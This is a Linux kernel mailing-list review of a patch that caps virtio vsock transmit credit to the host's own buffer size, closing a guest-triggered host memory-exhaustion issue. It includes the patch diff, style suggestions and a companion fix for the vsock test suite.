[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAGxU2F6TMP7tOo=DONL9CJUW921NXyx9T65y_Ai5pbzh1LAQaA@mail.gmail.com>
Date: Thu, 11 Dec 2025 11:08:21 +0100
From: Stefano Garzarella <sgarzare@...hat.com>
To: Melbin K Mathew <mlbnkm1@...il.com>
Cc: stefanha@...hat.com, kvm@...r.kernel.org, netdev@...r.kernel.org,
virtualization@...ts.linux.dev, linux-kernel@...r.kernel.org, mst@...hat.com,
jasowang@...hat.com, xuanzhuo@...ux.alibaba.com, eperezma@...hat.com,
davem@...emloft.net, edumazet@...gle.com, kuba@...nel.org, pabeni@...hat.com,
horms@...nel.org
Subject: Re: [PATCH] vsock/virtio: cap TX credit to local buffer size
On Thu, 11 Dec 2025 at 10:10, Stefano Garzarella <sgarzare@...hat.com> wrote:
>
> On Wed, Dec 10, 2025 at 04:00:19PM +0100, Melbin K Mathew wrote:
> >The virtio vsock transport currently derives its TX credit directly
> >from peer_buf_alloc, which is set from the remote endpoint's
> >SO_VM_SOCKETS_BUFFER_SIZE value.
>
> Why removing the target tree [net] from the tags?
>
> Also this is a v2, so the tags should have been [PATCH net v2], please
> check it in next versions, more info:
>
> https://www.kernel.org/doc/html/latest/process/submitting-patches.html#subject-line
>
> >
> >On the host side this means that the amount of data we are willing to
> >queue for a connection is scaled by a guest-chosen buffer size,
> >rather than the host's own vsock configuration. A malicious guest can
> >advertise a large buffer and read slowly, causing the host to allocate
> >a correspondingly large amount of sk_buff memory.
> >
> >Introduce a small helper, virtio_transport_peer_buf_alloc(), that
> >returns min(peer_buf_alloc, buf_alloc), and use it wherever we consume
> >peer_buf_alloc:
> >
> > - virtio_transport_get_credit()
> > - virtio_transport_has_space()
> > - virtio_transport_seqpacket_enqueue()
> >
> >This ensures the effective TX window is bounded by both the peer's
> >advertised buffer and our own buf_alloc (already clamped to
> >buffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE), so a remote guest
> >cannot force the host to queue more data than allowed by the host's
> >own vsock settings.
> >
> >On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
> >32 guest vsock connections advertising 2 GiB each and reading slowly
> >drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB and the system only
> >recovered after killing the QEMU process.
> >
> >With this patch applied, rerunning the same PoC yields:
> >
> > Before:
> > MemFree: ~61.6 GiB
> > MemAvailable: ~62.3 GiB
> > Slab: ~142 MiB
> > SUnreclaim: ~117 MiB
> >
> > After 32 high-credit connections:
> > MemFree: ~61.5 GiB
> > MemAvailable: ~62.3 GiB
> > Slab: ~178 MiB
> > SUnreclaim: ~152 MiB
> >
> >i.e. only ~35 MiB increase in Slab/SUnreclaim, no host OOM, and the
> >guest remains responsive.
>
> I think we should include here a summary of what you replied to Michael
> about other transports.
>
> I can't find your reply in the archive, but I mean the reply to
> https://lore.kernel.org/netdev/20251210084318-mutt-send-email-mst@kernel.org/
>
> >
> >Fixes: 06a8fc78367d ("VSOCK: Introduce virtio_vsock_common.ko")
> >Suggested-by: Stefano Garzarella <sgarzare@...hat.com>
> >Signed-off-by: Melbin K Mathew <mlbnkm1@...il.com>
> >---
> > net/vmw_vsock/virtio_transport_common.c | 27 ++++++++++++++++++++++---
> > 1 file changed, 24 insertions(+), 3 deletions(-)
> >
> >diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
> >index dcc8a1d58..02eeb96dd 100644
> >--- a/net/vmw_vsock/virtio_transport_common.c
> >+++ b/net/vmw_vsock/virtio_transport_common.c
> >@@ -491,6 +491,25 @@ void virtio_transport_consume_skb_sent(struct sk_buff *skb, bool consume)
> > }
> > EXPORT_SYMBOL_GPL(virtio_transport_consume_skb_sent);
> >
> >+/*
> >+ * Return the effective peer buffer size for TX credit computation.
>
> nit: block comment in this file doesn't leave empty line, so I'd follow
> it:
>
> @@ -491,8 +491,7 @@ void virtio_transport_consume_skb_sent(struct sk_buff *skb, bool consume)
> }
> EXPORT_SYMBOL_GPL(virtio_transport_consume_skb_sent);
>
> -/*
> - * Return the effective peer buffer size for TX credit computation.
> +/* Return the effective peer buffer size for TX credit computation.
> *
> * The peer advertises its receive buffer via peer_buf_alloc, but we
> * cap that to our local buf_alloc (derived from
>
> >+ *
> >+ * The peer advertises its receive buffer via peer_buf_alloc, but we
> >+ * cap that to our local buf_alloc (derived from
> >+ * SO_VM_SOCKETS_BUFFER_SIZE and already clamped to buffer_max_size)
> >+ * so that a remote endpoint cannot force us to queue more data than
> >+ * our own configuration allows.
> >+ */
> >+static u32 virtio_transport_tx_buf_alloc(struct virtio_vsock_sock *vvs)
> >+{
> >+ u32 peer = vvs->peer_buf_alloc;
> >+ u32 local = vvs->buf_alloc;
> >+
> >+ if (peer > local)
> >+ return local;
> >+ return peer;
> >+}
> >+
>
> I think here Michael was suggesting this:
>
> @@ -502,12 +502,7 @@ EXPORT_SYMBOL_GPL(virtio_transport_consume_skb_sent);
> */
> static u32 virtio_transport_tx_buf_alloc(struct virtio_vsock_sock *vvs)
> {
> - u32 peer = vvs->peer_buf_alloc;
> - u32 local = vvs->buf_alloc;
> -
> - if (peer > local)
> - return local;
> - return peer;
> + return min(vvs->peer_buf_alloc, vvs->buf_alloc);
> }
>
>
> > u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 credit)
> > {
> > u32 ret;
> >@@ -499,7 +518,8 @@ u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 credit)
> > return 0;
> >
> > spin_lock_bh(&vvs->tx_lock);
> >- ret = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
> >+ ret = virtio_transport_tx_buf_alloc(vvs) -
> >+ (vvs->tx_cnt - vvs->peer_fwd_cnt);
> > if (ret > credit)
> > ret = credit;
> > vvs->tx_cnt += ret;
> >@@ -831,7 +851,7 @@ virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk,
> >
> > spin_lock_bh(&vvs->tx_lock);
> >
> >- if (len > vvs->peer_buf_alloc) {
> >+ if (len > virtio_transport_tx_buf_alloc(vvs)) {
> > spin_unlock_bh(&vvs->tx_lock);
> > return -EMSGSIZE;
> > }
> >@@ -882,7 +902,8 @@ static s64 virtio_transport_has_space(struct vsock_sock *vsk)
> > struct virtio_vsock_sock *vvs = vsk->trans;
> > s64 bytes;
> >
> >- bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
> >+ bytes = (s64)virtio_transport_tx_buf_alloc(vvs) -
> >+ (vvs->tx_cnt - vvs->peer_fwd_cnt);
>
> nit: please align this:
>
> @@ -903,7 +898,7 @@ static s64 virtio_transport_has_space(struct vsock_sock *vsk)
> s64 bytes;
>
> bytes = (s64)virtio_transport_tx_buf_alloc(vvs) -
> - (vvs->tx_cnt - vvs->peer_fwd_cnt);
> + (vvs->tx_cnt - vvs->peer_fwd_cnt);
> if (bytes < 0)
> bytes = 0;
>
>
> Just minor things, but the patch LGTM, thanks!
I just noticed that vsock_test are now failing because one peer (client)
try to send more than TX buffer while the RX is waiting for the whole
data.
This should fix the test:
>From b69ca1fd3d544345b02cedfbeb362493950a87c1 Mon Sep 17 00:00:00 2001
From: Stefano Garzarella <sgarzare@...hat.com>
Date: Thu, 11 Dec 2025 10:55:06 +0100
Subject: [PATCH 1/1] vsock/test: fix seqpacket message bounds test
From: Stefano Garzarella <sgarzare@...hat.com>
The test requires the sender (client) to send all messages before waking
up the receiver (server).
Since virtio-vsock had a bug and did not respect the size of the TX
buffer, this test worked, but now that we have fixed the bug, it hangs
because the sender fills the TX buffer before waking up the receiver.
Set the buffer size in the sender (client) as well, as we already do for
the receiver (server).
Fixes: 5c338112e48a ("test/vsock: rework message bounds test")
Signed-off-by: Stefano Garzarella <sgarzare@...hat.com>
---
tools/testing/vsock/vsock_test.c | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/tools/testing/vsock/vsock_test.c b/tools/testing/vsock/vsock_test.c
index 9e1250790f33..af6665ed19d5 100644
--- a/tools/testing/vsock/vsock_test.c
+++ b/tools/testing/vsock/vsock_test.c
@@ -351,6 +351,7 @@ static void test_stream_msg_peek_server(const struct test_opts *opts)
static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
{
+ unsigned long long sock_buf_size;
unsigned long curr_hash;
size_t max_msg_size;
int page_size;
@@ -363,6 +364,16 @@ static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
exit(EXIT_FAILURE);
}
+ sock_buf_size = SOCK_BUF_SIZE;
+
+ setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
+ sock_buf_size,
+ "setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
+
+ setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
+ sock_buf_size,
+ "setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
+
/* Wait, until receiver sets buffer size. */
control_expectln("SRVREADY");
--
2.52.0
Please add that patch to a series (e.g. v3) which includes your patch,
and that fix for the test.
Maybe we can also add a new test to check exactly the problem you're
fixing, to avoid regressions.
Thanks,
Stefano
Powered by blists - more mailing lists